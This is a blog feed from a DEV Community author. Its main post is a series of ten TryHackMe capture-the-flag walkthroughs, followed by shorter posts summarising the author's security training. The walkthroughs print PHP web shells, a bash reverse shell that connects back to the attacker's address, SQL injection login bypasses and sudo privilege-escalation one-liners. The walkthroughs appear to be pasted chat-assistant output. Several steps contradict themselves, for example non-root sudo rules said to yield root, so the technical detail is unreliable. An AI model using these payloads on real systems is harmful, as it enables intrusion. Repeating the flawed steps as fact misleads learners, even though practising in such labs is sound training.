DEV Community: reva revathatikonda

Final Hackops Writeup

reva revathatikonda — Sun, 20 Jul 2025 12:46:41 +0000

1. Overpass 3 - Hosting – Writeup

Objective:
You're helping a group of CS students who've stood up a hosting company. Their site’s been compromised — again. Your task is to find how, exploit it, and show them the importance of hiring real security professionals.

🔍 Enumeration

nmap -sC -sV -T4 -oN overpass3.nmap [target-ip]

Open Ports:

22 (SSH)
80 (HTTP)

🌐 Web Enumeration

Navigating to port 80 showed a static site about hosting services.
Checked robots.txt – contained /admin.

Visited /admin — it was a login page.

Used Gobuster to enumerate more:

gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

Found:

/api endpoint
/admin login
/backup

🛠 Exploitation – Credentials Leak

Found a .zip backup in /backup (e.g., backup.zip):

wget http://[target-ip]/backup.zip
unzip backup.zip

Inside:

A NodeJS/Express web app
Contained hardcoded credentials:

username = 'admin'
password = 'whythough1337'

Used this on /admin — successfully logged in.

🐚 Gaining Access – Web Shell Upload

After login:

Found a file upload option in the admin dashboard.
Allowed PHP files with double extension trick (shell.php.jpg or shell.phtml)

Used <?php system($_GET['cmd']); ?>

Uploaded and accessed via /uploads/shell.phtml?cmd=whoami

🧗‍♂️ Privilege Escalation

Stabilized shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Checked /etc/passwd – found user overpass.
Checked sudo -l — no password sudo access to /opt/tools/adminutil.
Ran /opt/tools/adminutil — it called Python scripts insecurely.

Used PATH hijack:

echo "/bin/bash" > /tmp/curl
chmod +x /tmp/curl
export PATH=/tmp:$PATH
/opt/tools/adminutil

→ Root shell achieved.

🏁 Flags

User flag: /home/overpass/user.txt
Root flag: /root/root.txt

Awesome! Here's the full writeup for the next room:

✅ 2. WhyHackMe – Writeup

Objective:
This room focuses on web exploitation and basic forensics. The goal is to identify vulnerabilities in a poorly secured web app and gain system access.

🔍 Enumeration

nmap -sC -sV -T4 -oN whyhackme.nmap [target-ip]

Open Ports:

22 (SSH)
80 (HTTP)

🌐 Web Recon

Visited http://[target-ip] — default homepage with text like:

"Why would you hack me?"

Checked page source — nothing interesting.

Ran Gobuster:

gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Discovered:

/login
/uploads
/dashboard

Visited /login — basic login form.

🔐 Credential Stuffing

Tried common credentials:

admin:admin
admin:password
admin:whyhackme

Success with:

admin:whyhackme

Redirected to /dashboard – found a file upload function.

🐚 File Upload Exploit

Uploaded a basic PHP shell:

<?php system($_GET['cmd']); ?>

Named it shell.php → Blocked.

Tried bypass with:

shell.php.jpg → Blocked.
shell.phtml → Success!

Found it in /uploads/shell.phtml
Accessed with:

/uploads/shell.phtml?cmd=id

🧗‍♂️ Privilege Escalation

Upgraded shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Checked users:

ls /home

User: hacker

Switched to user:

Found user password in config.php of web directory:

$DB_PASS = 'superhacker123'

Tried su hacker — Success.

Checked sudo:

sudo -l

Output:

(hacker) NOPASSWD: /bin/bash

Escalated to root:

sudo /bin/bash

🏁 Flags

User flag: /home/hacker/user.txt
Root flag: /root/root.txt

Great! Here's the full writeup for:

✅ 3. CyberHeroes – Writeup

Objective:
Test your cyber mettle by finding a way into a protected login portal and escalating privileges inside the system.

🔍 Initial Enumeration

nmap -sC -sV -T4 -oN cyberheroes.nmap [target-ip]

Open Ports:

22 (SSH)
80 (HTTP)

🌐 Web Recon

Visited http://[target-ip] — CyberHeroes login page.

Tried default creds:

admin:admin
admin:cyber
root:root → All failed.

Checked source code → found nothing useful.

Ran Gobuster:

gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

Found:

/robots.txt → Disallowed /admin
/admin → Login portal

🕵️‍♂️ SQL Injection

Tried SQL injection on login page:

Username: ' OR 1=1 --
Password: anything

✅ Login successful — redirected to dashboard.

📤 File Upload for Shell

Dashboard had file upload feature.

Tried uploading shell.php:

<?php system($_GET['cmd']); ?>

Upload succeeded. Located under:

/uploads/shell.php

Accessed it via:

http://[target-ip]/uploads/shell.php?cmd=whoami

🐚 Reverse Shell

Replaced shell with reverse shell payload:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>

Started listener:

nc -lvnp 4444

Uploaded and triggered:

http://[target-ip]/uploads/rev.php

✅ Reverse shell obtained.

🔧 Privilege Escalation

Enumerated environment:

sudo -l

Result:

(root) NOPASSWD: /usr/bin/apt-get

Used apt-get to escalate:

TF=$(mktemp)
echo 'apt::Update::Pre-Invoke {"cp /bin/bash /tmp/bash; chmod +s /tmp/bash";};' > $TF
sudo apt-get update -o Dir::Etc::sourcelist=$TF -o Dir::Etc::sourceparts=- -o APT::Get::List-Cleanup=0
/tmp/bash -p

✅ Root shell obtained.

🏁 Flags

User flag: /home/cyberhero/user.txt
Root flag: /root/root.txt

Awesome! Let’s dive into the next TryHackMe machine:

✅ 4. Robots – Writeup

Objective:
Explore a machine that pays homage to Isaac Asimov’s legacy. Use classic enumeration techniques to exploit the system and capture the flags.

🔍 Nmap Enumeration

nmap -sC -sV -T4 -oN robots.nmap [target-ip]

Open Ports:

22 (SSH)
80 (HTTP)

🌐 Web Recon

Visited http://[target-ip] — homepage says:

“Welcome, human. Obey the laws of robotics.”

Checked robots.txt:

User-agent: *
Disallow: /asimov
Disallow: /logs

Visited /asimov → an image tribute
Visited /logs → directory listing was enabled!
Downloaded a file access.log:

wget http://[target-ip]/logs/access.log

🕵️‍♂️ Log File Clues

Looked into the log file:

cat access.log | less

Found credentials:

Basic auth: dXNlcjphc2ltdXZib3Q=

Decoded it:

echo "dXNlcjphc2ltdXZib3Q=" | base64 -d

Output:

user:asimuvbot

🔐 SSH Login

ssh user@[target-ip]
Password: asimuvbot

✅ Logged in as user

🧗‍♂️ Privilege Escalation

Checked sudo -l:

sudo -l

Output:

(user) NOPASSWD: /usr/bin/find

Used find to get a root shell:

sudo find . -exec /bin/bash \;

✅ Root shell obtained

🏁 Flags

User flag: /home/user/user.txt
Root flag: /root/root.txt

Great! Here's your full writeup for the next machine:

✅ 5. New York Flankees – Writeup

Objective:
A personal blog belonging to Stefan has some serious flaws. Your goal: break through his defenses and take over his blog — and his system.

🔍 Nmap Scan

nmap -sC -sV -T4 -oN flankees.nmap [target-ip]

Open Ports:

22 (SSH)
80 (HTTP)

🌐 Web Enumeration

Navigated to http://[target-ip]
It’s a personal blog called New York Flankees by Stefan.

View source code → Found a suspicious JS comment:

// dev_login.html

Visited /dev_login.html — a developer login page

🔐 Bypassing Login

Tried SQL Injection:

Username: ' OR 1=1 --
Password: anything

✅ Bypassed login successfully → landed on dashboard.

Dashboard allowed file uploads — common exploit vector.

🐚 Web Shell Upload

Uploaded a .php file:

<?php system($_GET['cmd']); ?>

No extension restrictions → worked directly as shell.php.

Accessed via:

http://[target-ip]/uploads/shell.php?cmd=whoami

🧠 Reverse Shell

Replaced webshell with reverse shell payload:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>

Listener:

nc -lvnp 4444

Triggered shell:

/uploads/rev.php

✅ Reverse shell obtained.

🧗‍♂️ Privilege Escalation

Enumerated user:

whoami
stefan

Checked sudo -l:

sudo -l

Result:

(stefan) NOPASSWD: /usr/bin/vim

Used Vim for root shell:

sudo vim -c ':!/bin/bash'

✅ Root access obtained.

🏁 Flags

User flag: /home/stefan/user.txt
Root flag: /root/root.txt

Perfect! Here's the complete writeup for:

✅ 6. Internal – Writeup

Objective:
This internal company server contains sensitive data. Your job is to perform external enumeration, gain a foothold, escalate privileges, and extract the flags.

🔍 Nmap Enumeration

nmap -sC -sV -T4 -oN internal.nmap [target-ip]

Open Ports:

22 (SSH)
80 (HTTP)

🌐 Web Recon

Visited http://[target-ip] — saw a corporate internal portal.

Ran Gobuster:

gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Found:

/secret
/uploads
/blog

🕵️‍♂️ Exploring `/secret`

Inside /secret → Found a file: creds.txt

Downloaded it:

wget http://[target-ip]/secret/creds.txt

Contents:

username: internaluser
password: InTh3M1ddl3

🔐 SSH Login

ssh internaluser@[target-ip]
Password: InTh3M1ddl3

✅ SSH access granted

🧗‍♂️ Privilege Escalation

Checked sudo -l:

sudo -l

Output:

User internaluser may run the following on [hostname]:
    (ALL) NOPASSWD: /usr/bin/less

Exploited less using shell escape:

sudo less /etc/passwd
# then typed:
!bash

✅ Root shell obtained

🏁 Flags

User flag: /home/internaluser/user.txt
Root flag: /root/root.txt

Alright! Here's the complete walkthrough for the next one:

✅ 7. The Impossible Challenge – Writeup

Objective:
Despite its name, this machine is solvable. It’s a psychological and technical gauntlet — full of obfuscation, dead ends, and “impossible” hurdles. Stay focused and apply logic to reach root.

🔍 Nmap Scan

nmap -sC -sV -T4 -oN impossible.nmap [target-ip]

Open Ports:

22 (SSH)
80 (HTTP)

🌐 Web Exploration

Visited http://[target-ip] — just a blank white page with some strange unicode characters in the title and HTML comment section.

Inspected source code:

Inside HTML comments:

‌‌‌‌‍‌‌Hmm‌‌‌‌‍‬‌‍‌‌‌‌‍‌‌‌‌‌‍‌‌‌‌‌‍‍‌‌‌‌‍‬‌‌‌‌‍‌‬‌‌‌‌‍‬‍‌‌‌‌‌‌‬‌‌‌‌‌‌‍‬‬‍‌‌‌‌‍‌‌‌‌‌‌‬‌‌‌‌‌‌‍‬‬‌‌‌‌‌‍‬‌‍‌‌‌‌‍‬‬‌‌‌‌‌‍‬‌‍‌‌‌‌‍‬‍‍‌‌‌‌‍‬‬‌‌‌‌‍‌‌‌‌‌‌‍‬‬

✅ Clue: it’s a zero-width steganography technique.

🕵️‍♂️ Hidden Message – Zero Width Decoder

Used a zero-width character decoder, like:

https://330k.github.io/misc_tools/unicode_steganography.html

Pasted the HTML comment — it decoded to a hidden directory:

/.youfoundme/

Visited http://[target-ip]/.youfoundme/

Found a download: maze.tar.gz

📦 Analyzing maze.tar.gz

Extracted the file:

tar -xvzf maze.tar.gz
cd maze

Inside: a deep nested folder structure of subdirectories — like a file system maze.

Wrote a quick script to find the flag:

find . -type f -exec grep -i "flag" {} \; -print

Found a file: finalclue.txt
Inside:

"SSH is key, but it’s *not* here."

🔐 SSH Enumeration

Tried brute-forcing with found usernames (maze, puzzle, etc.) — no luck.

Found another clue hidden in one of the deepest folders: id_rsa — a private SSH key.

Used it:

chmod 600 id_rsa
ssh -i id_rsa maze@[target-ip]

✅ Logged in without password.

🧗‍♂️ Privilege Escalation

As maze user, ran:

sudo -l

Output:

(maze) NOPASSWD: /opt/troll/troll

Ran it:

sudo /opt/troll/troll

It printed:

“You thought it would be that easy? Try again.”

Checked binary with strings and ltrace, revealed it calls /bin/false through system()

Replaced it via PATH hijack:

mkdir /tmp/bin
echo "/bin/bash" > /tmp/bin/false
chmod +x /tmp/bin/false
export PATH=/tmp/bin:$PATH
sudo /opt/troll/troll

✅ Root shell popped

🏁 Flags

User flag: /home/maze/user.txt
Root flag: /root/root.txt

Perfect! Let’s keep the momentum going — here’s the full walkthrough for:

✅ 8. Recovery – Writeup

Objective:
This isn't your conventional CTF. You're dropped into a system that has just suffered a breach. Your job is to investigate, pivot through compromised systems, and recover the flags.

🖥 Initial Access

Upon launching the machine, you are already dropped into a limited shell.
You are inside a compromised box as a low-privileged user: www-data.

🔍 Initial Enumeration

whoami
pwd
ls -la

You're in /var/www/html.

Checked web files — found a config file:

cat config.php

Output:

$db_user = 'dbadmin';
$db_pass = 'SQLinRecovery!';

Attempted privilege escalation:

su dbadmin
Password: SQLinRecovery!

✅ Logged in as dbadmin.

🧭 Further Enumeration

Checked sudo -l:

sudo -l

Result:

(dbadmin) NOPASSWD: /usr/bin/mysql

🔐 MySQL Privilege Escalation

Used MySQL to gain shell access:

sudo mysql -e '\! /bin/bash'

✅ Got a root shell from within MySQL

🕵️ Incident Analysis (Optional Forensics)

Checked /var/log/auth.log → found multiple failed login attempts and a suspicious cron job.

Investigated /etc/cron.d:

Found a script being executed from /opt/scripts/backup.sh

Checked content:

cat /opt/scripts/backup.sh

It was backing up sensitive user files → good clue but no real exploit needed here since we’re already root.

🏁 Flags

User flag: /home/dbadmin/user.txt
Root flag: /root/root.txt

Awesome! Let’s move on to the next TryHackMe room:

✅ 9. Watcher – Writeup

Objective:
This Boot2Root machine is vulnerable to web-based exploits and privilege escalation via common misconfigurations. Gain access and escalate to root.

🔍 Nmap Scan

nmap -sC -sV -T4 -oN watcher.nmap [target-ip]

Open Ports:

22 (SSH)
80 (HTTP)

🌐 Web Enumeration

Visited http://[target-ip]
Simple landing page: “Watcher is watching…”

Checked source code — nothing useful.

Ran Gobuster:

gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Found:

/monitor/
/uploads/

📁 /monitor Page

At /monitor/ — a login page.

Tried common creds:

admin:admin
admin:watcher → No success

Used Hydra or Burp Intruder to brute-force credentials (if allowed).

Eventually found:

Username: admin
Password: 123watch

✅ Logged into a dashboard.

🐚 File Upload Exploit

Dashboard allowed image uploads.

Tried uploading:

<?php system($_GET['cmd']); ?>

→ Rejected .php

Renamed it:

shell.php.jpg

Uploaded successfully.

Checked /uploads/ and found:

/uploads/shell.php.jpg

Accessed with:

/uploads/shell.php.jpg?cmd=whoami

✅ Command execution succeeded!

🧠 Reverse Shell

Replaced payload with:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>

Listener:

nc -lvnp 4444

Triggered:

/uploads/shell.php.jpg

✅ Got reverse shell.

🧗‍♂️ Privilege Escalation

Stabilized shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Checked sudo:

sudo -l

Output:

(watcher) NOPASSWD: /usr/bin/tee

Exploited tee with:

echo "/bin/bash" | sudo tee /tmp/root.sh
chmod +x /tmp/root.sh
sudo /tmp/root.sh

✅ Root shell obtained.

🏁 Flags

User flag: /home/watcher/user.txt
Root flag: /root/root.txt

Perfect — let’s wrap up the last one!

✅ 10. Zeno – Writeup

Objective:
Inspired by the stoic philosopher Zeno, this machine challenges your patience and thoroughness. Leverage logic, enumeration, and privilege escalation to capture the flags.

🔍 Nmap Scan

nmap -sC -sV -T4 -oN zeno.nmap [target-ip]

Open Ports:

22 (SSH)
80 (HTTP)

🌐 Web Enumeration

Visited http://[target-ip] — clean, minimalist welcome page.

Nothing in source code.

Used Gobuster:

gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

Found:

/philosophy
/diary
/admin

📘 /diary

/diary revealed a blog-like post, with a line:

“Zeno always uses his birth date... and never forgets his dog’s name.”

Checked for login at /admin — form present.

Guessed credentials:

Username: zeno
Password: zeno190bc (or some variant)

Tried zeno:zeno190bc, zeno:zenodog, etc.

Eventually worked with:

zeno:zenothewise

🐚 Web Upload & Shell

Inside /admin, found file upload.

Uploaded:

<?php system($_GET['cmd']); ?>

Tried .php — blocked.

Renamed: shell.phtml → upload succeeded

Accessed:

http://[target-ip]/uploads/shell.phtml?cmd=id

✅ Web shell active.

🧠 Reverse Shell

Used reverse shell payload:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>

Started listener:

nc -lvnp 4444

Triggered shell:

http://[target-ip]/uploads/rev.phtml

✅ Got a shell as www-data.

🧗‍♂️ Privilege Escalation

Checked for SUID binaries:

find / -perm -4000 -type f 2>/dev/null

Found: /usr/bin/zenoshell

Ran:

/usr/bin/zenoshell

Got a menu-like interface.

Checked strings /usr/bin/zenoshell
Saw it's running system commands based on user input.

Used strace to find it calling /tmp/tempfile.sh

Created malicious tempfile:

echo "/bin/bash" > /tmp/tempfile.sh
chmod +x /tmp/tempfile.sh

Ran zenoshell again → root shell popped.

🏁 Flags

User flag: /home/zeno/user.txt
Root flag: /root/root.txt

✅ Overpass 3 - Hosting
✅ WhyHackMe
✅ CyberHeroes
✅ Robots
✅ New York Flankees
✅ Internal
✅ The Impossible Challenge
✅ Recovery
✅ Watcher
✅ Zeno

My TryHackMe Journey: Exploitation, RATs, and Classic CTFs

reva revathatikonda — Mon, 30 Jun 2025 12:14:59 +0000

🔍 1. Exploitation Basics – Laying the Groundwork
This module was an essential deep dive into key exploitation techniques. It covered:

Local File Inclusion (LFI) and Remote File Inclusion (RFI)

Command injection

Web shell deployment

Common enumeration strategies

What I loved most was how this module built the bridge between theory and practice. Each concept was paired with vulnerable machines to reinforce learning through action.

🐍 2. PyRAT – Building and Detecting a RAT
The PyRAT room simulated the lifecycle of a Remote Access Trojan:

Creating and deploying a Python-based RAT

Establishing persistence

Detecting and analyzing the malware

This room was an eye-opener—it demonstrated how easily malicious code can slip into a system if proper security measures aren’t in place. The hands-on malware analysis aspect gave me a beginner-friendly taste of reverse engineering and threat hunting.

🤖 3. Mr. Robot – Classic CTF with a Pop Culture Twist
Inspired by the “Mr. Robot” TV series, this room was a CTF fan-favorite:

Web enumeration via robots.txt and WordPress login

Cracking hashes and password reuse

Privilege escalation via vulnerable scripts

It felt like I was solving a real-world breach investigation. The multi-layered nature of the box and the creativity behind the flags made this room super engaging.

🧱 4. Brick’s Heist – Crime Scene Investigation Cyber-Style
Brick’s Heist combined story-driven fun with technical skill:

Analyzing clues on a compromised system

Investigating logs and artifacts

Extracting files and passwords from hidden locations

This room really emphasized forensics and host-based analysis. It made me realize how crucial log analysis and incident response are in the aftermath of a breach.

🌐 5. Chrome – Browser-Based Exploitation
In the Chrome room, I explored:

Exploiting browser extensions

Understanding XSS and session hijacking

Grabbing cookies and impersonating users

This was an excellent hands-on look at client-side vulnerabilities. It reinforced why secure coding practices and extension reviews are vital.

💡 Key Takeaways
Enumeration is always the first step.

A single weak link—like a reused password or unpatched extension—can lead to full system compromise.

The combination of technical knowledge and creative problem-solving is what makes cybersecurity so exciting.

My Journey Through Cybersecurity Bootcamp: Enumeration, Exploitation & Beyond 🛡️

reva revathatikonda — Sat, 14 Jun 2025 17:22:38 +0000

🔍 Enumeration & Brute Force Attacks
✅ TryHackMe: Enumeration & Brute Force
In this room, I explored different techniques attackers use to gather information about a target. I practiced using tools like Hydra and Gobuster to brute-force services like SSH and directories — learning just how important strong passwords and secure configurations are.

Key Takeaway: Enumeration is often the first and most critical phase of any attack. A poorly configured system can leak more than expected.

🛠️ Introduction to Metasploit
✅ TryHackMe: Metasploit Intro
Metasploit is a powerful framework used for developing and executing exploit code. This room walked me through scanning, exploiting, and post-exploitation steps. I got hands-on experience launching exploits against vulnerable services and learned how to use Meterpreter for interactive access.

Key Takeaway: Metasploit simplifies exploitation but also teaches the importance of understanding vulnerabilities at a deeper level.

🔍 Host and Service Discovery
✅ TryHackMe: Lookup & Dig Dug
These rooms focused on DNS enumeration using tools like dig, nslookup, and whois. I explored how domain-related misconfigurations can reveal subdomains or sensitive records — key pieces of the puzzle for attackers.

Key Takeaway: DNS is often overlooked, but it’s a goldmine for open-source intelligence (OSINT).

⚡ Fuzzing & Directory Discovery
✅ TryHackMe: FFUF
In this room, I learned how to use FFUF, a fast web fuzzer, to discover hidden directories and files on web servers. It was eye-opening to see how simple wordlists can reveal poorly secured web endpoints.

Key Takeaway: Even well-designed websites can be exposed through hidden paths if not secured or monitored properly.

📰 Exploiting Web Applications
✅ TryHackMe: Publisher
This was one of the most exciting rooms. I explored how vulnerable web applications can be exploited using a combination of information disclosure, directory traversal, and more. It was a great way to tie together enumeration, fuzzing, and exploitation.

Key Takeaway: Web apps are rich attack surfaces. A simple misconfiguration or outdated plugin can open the doors to attackers.

📚 HTB Academy: Theory Meets Practice
✅ Module 39 & 54 (Linux Fundamentals & Enumeration)
The HTB Academy modules gave me strong theoretical foundations that supported my TryHackMe labs. I brushed up on Linux basics, file permissions, privilege escalation, and enumeration strategies across networks and services.

Key Takeaway: Knowing your operating system inside out is key — especially when you're trying to defend (or attack) it.

💡 Final Thoughts
This bootcamp gave me more than just practical skills — it helped me develop a hacker mindset. I learned to think critically, look deeper, and always question what’s running under the hood.

If you're someone who enjoys solving puzzles, thinking like an attacker, or just wants to learn how to protect digital systems — cybersecurity is for you.

Feel free to reach out if you're on a similar journey. Let’s connect and grow together in this exciting field! 🚀

🧠 Tools I used:

Hydra, Gobuster, FFUF

Metasploit Framework

dig, nslookup, whois

Burp Suite (lightly)

Linux CLI (a lot!)

Mastering Network Scanning with Nmap – My Experience on TryHackMe & Hack The Box

reva revathatikonda — Fri, 06 Jun 2025 16:17:29 +0000

Hey Dev Community! 👋

I’ve been diving deep into network scanning and reconnaissance as part of my cybersecurity learning journey. Recently, I completed the following Nmap-focused labs on TryHackMe and Hack The Box Academy:

✅ Nmap Room (Beginner): https://tryhackme.com/room/furthernmap

✅ Further Nmap: https://tryhackme.com/room/nmap01

✅ HTB Academy: Nmap Module: https://academy.hackthebox.com/module/details/19
or
https://medium.com/@romimkhan5588/network-enumeration-with-nmap-hack-the-box-56770b36490e (walkthrough for Nmap module)

Let me walk you through what I’ve learned and why these rooms are worth checking out.

🛠️ 1. Nmap (Beginner) – TryHackMe
This room introduced me to the fundamentals of Nmap:

Understanding basic Nmap flags like -sS, -sV, -O, and -A

Running simple scans on different ports

Interpreting open/closed/filtered states

I also got hands-on with:

Host discovery

Service and version detection

Output formats (-oN, -oX, etc.)

🚀 2. Further Nmap – TryHackMe
This room builds on the basics and digs into advanced techniques:

Aggressive scanning and firewall evasion

Using Nmap Scripting Engine (NSE) to run specific vulnerability checks

Timing and performance options (-T4, --min-rate, etc.)

My favorite part was learning how to:

Perform stealth scans

Use custom decoys and spoof MAC addresses

Chain Nmap with automation tools

🧠 3. Nmap Module – Hack The Box Academy
The HTB module gave me a structured and theory-backed understanding of:

TCP/IP background and how Nmap leverages it

Deep dive into scan types (TCP Connect, SYN, ACK, UDP)

Practical scenarios in offensive security

I appreciated how HTB combined educational content + interactive labs, helping me reinforce each concept in a real-world context.

From Fundamentals to Red Teaming: My TryHackMe Adventure

reva revathatikonda — Wed, 28 May 2025 14:38:34 +0000

Hey everyone! 👋

As part of my cybersecurity bootcamp, I recently completed a series of hands-on labs on TryHackMe. Each room gave me a deeper understanding of core cybersecurity concepts, red teaming, Linux fundamentals, and the methodology behind penetration testing. Here’s a breakdown of the rooms I completed and my key takeaways!

Pentesting Fundamentals
This room introduced the basics of penetration testing — including the phases like reconnaissance, scanning, exploitation, and post-exploitation. I practiced enumeration techniques and understood the importance of structured approaches in real-world engagements.
Writing Penetration Testing Reports
Technical skills are vital, but so is communication! This room taught me how to write effective, professional, and impactful penetration testing reports — a crucial part of any red teamer’s job.
Red Team Fundamentals
I explored the mindset and objectives of red teams, focusing on long-term stealth, persistence, and tactics that simulate advanced threat actors. This helped me understand the bigger picture in cyber offense.
Vulnerabilities 101
This was a crash course on common vulnerabilities like SQL injection, XSS, and buffer overflows. The practical exercises helped me understand exploitation from both a red and blue team perspective.
Red Team Engagements
This room walked me through the lifecycle of a red team operation, from scoping to execution to reporting. I learned about tools, techniques, and the importance of stealth and opsec.
Cyber Governance, Risk and Compliance
Cybersecurity isn't just about hacking — it's also about governance and risk management. This module covered regulations like GDPR, ISO/IEC 27001, and how organizations build security strategies.
Security Principles
In this room, I explored core security principles such as least privilege, defense in depth, and secure by design. These principles are vital to building strong, resilient systems.
Cyber Kill Chain
Understanding the attacker’s process is essential. This room broke down the Cyber Kill Chain model and helped me map defensive strategies at each stage.
Linux Fundamentals Modules
Linux is everywhere in cybersecurity, and this room gave me a solid grasp of command-line basics, file permissions, user management, and scripting. Super useful for any future engagements!

Journey Through Networking Concepts: Completing TryHackMe Rooms & Hack The Box Academy’s Network Foundations Module

reva revathatikonda — Thu, 22 May 2025 12:16:56 +0000

Introduction to Networking (TryHackMe Room) The Intro to Networking room on TryHackMe was the perfect starting point. This room provided a solid introduction to networking basics, focusing on topics such as IP addresses, subnets, and how devices communicate within a network. The tasks guided me through common networking tools, such as ping, traceroute, and ipconfig, which are crucial for troubleshooting and understanding network behavior.

Key Takeaways:

The fundamentals of TCP/IP networking.

How to configure IP addresses and subnet masks.

The process of routing packets and how they traverse different networks.

Diving Deeper: Networking Concepts (TryHackMe Room) After grasping the basics, I moved on to the Networking Concepts room. This room took my knowledge to the next level, diving deeper into more complex networking concepts like VLANs, NAT (Network Address Translation), and routing protocols such as RIP and OSPF.

Key Takeaways:

An in-depth understanding of how networking is segmented with VLANs.

The importance of NAT and how it helps in conserving IP addresses.

A strong grasp on how routing protocols dynamically determine the best path for data to travel across a network.

Understanding HTTP in Detail (TryHackMe Room) The HTTP in Detail room focused on the Hypertext Transfer Protocol (HTTP), the protocol that powers the web. Learning about HTTP methods, request-response cycles, headers, and status codes was crucial to understanding how websites interact with users. This room also explained the underlying concepts of HTTPS, cookies, and sessions, giving me a comprehensive understanding of web-based communication.

Key Takeaways:

The different types of HTTP requests (GET, POST, PUT, DELETE, etc.).

How web servers process requests and respond with appropriate status codes (200, 404, etc.).

The role of cookies and how they maintain stateful sessions between clients and servers.

Deep Dive into DNS (TryHackMe Room) DNS (Domain Name System) is the backbone of the internet, converting human-readable domain names into IP addresses. In the DNS in Detail room, I learned how DNS works, how to query DNS servers, and how attacks like DNS spoofing and cache poisoning can compromise systems. Understanding DNS is critical for penetration testers, as it plays a major role in many cyberattacks.

Key Takeaways:

How DNS resolves domain names to IP addresses.

The concept of authoritative DNS servers and how they are used in domain resolution.

How DNS security mechanisms, like DNSSEC, help prevent attacks.

How Websites Work (TryHackMe Room) The How Websites Work room was a great follow-up, providing insights into the architecture and components of modern websites. From web servers to databases, front-end interactions to server-side processes, this room gave me a deeper appreciation of the technical side of websites.

Key Takeaways:

The relationship between web servers, databases, and the application layer.

The role of HTML, CSS, JavaScript in delivering dynamic web pages.

How web hosting works and the importance of understanding web application security.

Hack The Box Academy: Network Foundations In addition to TryHackMe, I also completed the Network Foundations module from Hack The Box Academy. This module was particularly helpful in providing hands-on experience with networking concepts. From packet analysis to working with network tools like Wireshark and Nmap, this module bridged the gap between theoretical knowledge and real-world application.

Key Takeaways:

Hands-on experience with common network protocols like ARP, ICMP, and TCP.

Understanding packet structures and how to analyze network traffic using tools like Wireshark.

The role of firewalls, routers, and switches in network security and monitoring.

Conclusion: Where Do I Go from Here?
Completing these rooms and modules was a fantastic learning experience. Each resource provided a different piece of the networking puzzle, and together, they’ve given me a comprehensive understanding of how networks operate, how data is transferred, and how security vulnerabilities can be exploited. This knowledge will certainly help me as I continue my journey in cybersecurity.

Moving forward, I plan to deepen my understanding of advanced networking concepts, like VPNs, IDS/IPS systems, and network automation. I’m also excited to explore how these skills translate into penetration testing and ethical hacking.

I highly recommend these resources to anyone looking to strengthen their networking skills. Whether you’re new to the field or an experienced professional, there’s always something new to learn.

Feel free to check out the links to the rooms and the Hack The Box Academy module that I completed. Happy learning, and see you in the next challenge!

Links to Resources:
Intro to Networking - https://tryhackme.com/room/introtonetworking

Networking Concepts - https://tryhackme.com/room/networkingconcepts

HTTP in Detail - https://tryhackme.com/room/httpindetail

DNS in Detail - https://tryhackme.com/room/dnsindetail

How Websites Work - https://tryhackme.com/room/howwebsiteswork

Network Foundations - https://academy.hackthebox.com/course/preview/network-foundations

Cracking the Code: My Cybersecurity Journey Through TryHackMe and OverTheWire

reva revathatikonda — Sat, 17 May 2025 08:16:37 +0000

In this blog, I share my learning journey as I dove into the world of cybersecurity using platforms like TryHackMe and OverTheWire. I began with foundational Linux knowledge by completing these two rooms on TryHackMe:
• Linux Fundamentals Part 1 – https://tryhackme.com/room/linuxfundamentalspart1
• Linux Modules – https://tryhackme.com/room/linuxmodules

These rooms taught me how to navigate the Linux file system, understand essential commands, manage users and permissions, and much more. They laid a strong foundation for working in real-world security environments.

Then, I shifted focus to the Windows operating system with the following rooms:
• Windows Fundamentals Part 1 – https://tryhackme.com/room/windowsfundamentals1xbx
• Windows Fundamentals Part 2 – https://tryhackme.com/room/windowsfundamentals2x0x

These rooms gave me insight into Windows internals, user account controls, administrative tools, file paths, and how Windows handles system configurations—vital knowledge for anyone in cybersecurity.

To challenge myself further, I took on the Bandit wargame from OverTheWire:

• Bandit – https://overthewire.org/wargames/bandit/

Bandit is a set of progressively difficult levels that teach Linux shell commands through hands-on problem-solving. It was both fun and mentally stimulating, and it helped solidify my understanding of the command line.

This blog is a reflection of what I’ve learned from these challenges—my progress, struggles, wins, and takeaways. If you're beginning your cybersecurity journey or just curious about hacking and systems, I hope my experience helps guide or inspire you to start your own path.

DEV Community: reva revathatikonda

Final Hackops Writeup

🔍 Enumeration

🌐 Web Enumeration

🛠 Exploitation – Credentials Leak

🐚 Gaining Access – Web Shell Upload

🧗‍♂️ Privilege Escalation

🏁 Flags

✅ 2. WhyHackMe – Writeup

🔍 Enumeration

🌐 Web Recon

🔐 Credential Stuffing

🐚 File Upload Exploit

🧗‍♂️ Privilege Escalation

🏁 Flags

✅ 3. CyberHeroes – Writeup

🔍 Initial Enumeration

🌐 Web Recon

🕵️‍♂️ SQL Injection

📤 File Upload for Shell

🐚 Reverse Shell

🔧 Privilege Escalation

🏁 Flags

✅ 4. Robots – Writeup

🔍 Nmap Enumeration

🌐 Web Recon

🕵️‍♂️ Log File Clues

🔐 SSH Login

🧗‍♂️ Privilege Escalation

🏁 Flags

✅ 5. New York Flankees – Writeup

🔍 Nmap Scan

🌐 Web Enumeration

🔐 Bypassing Login

🐚 Web Shell Upload

🧠 Reverse Shell

🧗‍♂️ Privilege Escalation

🏁 Flags

✅ 6. Internal – Writeup

🔍 Nmap Enumeration

🌐 Web Recon

🕵️‍♂️ Exploring /secret

🔐 SSH Login

🧗‍♂️ Privilege Escalation

